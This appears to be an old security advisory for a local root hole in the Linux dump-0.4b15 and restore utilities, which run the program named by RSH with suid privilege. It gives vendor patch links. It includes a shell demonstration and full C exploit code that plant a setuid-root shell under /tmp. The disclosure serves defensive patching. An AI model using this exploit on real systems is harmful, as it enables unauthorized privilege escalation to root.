Vulnerability: dump
Affected: dump-0.4b15

Description

Mat found the following. The Linux dump command executes the external program named by the RSH environment variable with suid (root) privilege.

Example:

```
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x   1 root     tty        316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
```

This is a quick and dirty exploit:

```c
/*
**
** dump-0.4b15x.c
**
** dump-0.4b15 exploit:
** Redhat 6.2 dump command executes
** external program with suid priviledge.
**
** affected:
**   /sbin/dump
**   /sbin/dump.static
**   /sbin/restore
**   /sbin/restore.static
**
** Bug found by mat@hacksware.com
**
** This example was coded by md0claes@mdstud.chalmers.se
** It was written for EDUCATIONAL PURPOSES ONLY.
**
**
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <ctype.h>          /* tolower() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RUNME     "/tmp/runme"      /* tmp file */
#define SUID_PATH "/tmp/superdude"  /* the power of root */

void usage(char *pname)
{
    fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
    fprintf(stdout, "  d - exploit /sbin/dump\n");
    fprintf(stdout, "  s - exploit /sbin/dump.static\n");
    fprintf(stdout, "  r - exploit /sbin/restore\n");
    fprintf(stdout, "  p - exploit /sbin/restore.static\n\n");
}

int main(int argc, char *argv[], char *envp[])
{
    int fd;
    pid_t pid;
    /* environment handed to the suid target; envp arrays must be NULL-terminated */
    char *bad_env[] = { "TAPE=garbage:garbage", "RSH=" RUNME, NULL };
    /* script that RSH will point at */
    char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash " SUID_PATH "\nchmod 6755 " SUID_PATH };
    char *suid[] = { SUID_PATH, NULL };
    char *av[] = { "/sbin/restore.static", "restore.static", "-t", "/tmp/foo" };

    if (argc != 2) {
        usage(argv[0]);
        exit(1);
    }

    switch (tolower(argv[1][0])) {
    case 'd':
        av[0] = "/sbin/dump";
        av[1] = "dump";
        av[2] = "-0";
        av[3] = "/";
        break;
    case 's':
        av[0] = "/sbin/dump.static";
        av[1] = "dump.static";
        av[2] = "-0";
        av[3] = "/";
        break;
    case 'r':
        av[0] = "/sbin/restore";
        av[1] = "restore";
        break;
    case 'p':
        break;
    default:
        usage(argv[0]);
        exit(1);
    }

    if ((fd = open(RUNME, O_WRONLY | O_CREAT | O_TRUNC, 0755)) == -1) {
        perror("fopen");
        exit(1);
    }
    if (write(fd, runbuf, sizeof(runbuf)) == -1) {
        perror("write");
        exit(1);
    }
    close(fd);

    if ((pid = fork()) < 0) {
        perror("fork");
        exit(1);
    } else if (pid == 0) {
        if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
            perror("execle");
            _exit(1);
        }
    }

    sleep(1);
    unlink(RUNME);
    fprintf(stdout, "\nExploited %s \n", av[0]);
    fprintf(stdout, "Running " SUID_PATH "\n");
    execve(SUID_PATH, suid, envp);
    exit(0);
}
```

Solution

The latest version is available at:

ftp://ftp.sourceforge.net/pub/sourceforge/dump/

dump is no longer suid root.
For RedHat:

ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm

For Trustix:

All released versions of Trustix Secure Linux contain a version of dump that is known to have a local root exploit. People with untrusted local users should upgrade as soon as possible. Get the packages at:

ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/

dump-0.4b19-2tr.i586.rpm
rmt-0.4b19-2tr.i586.rpm

For Conectiva:

The last mandatory update of the dump package brought it up to version 0.4b18 with the SUID bits disabled. These packages do not have the vulnerability discussed above.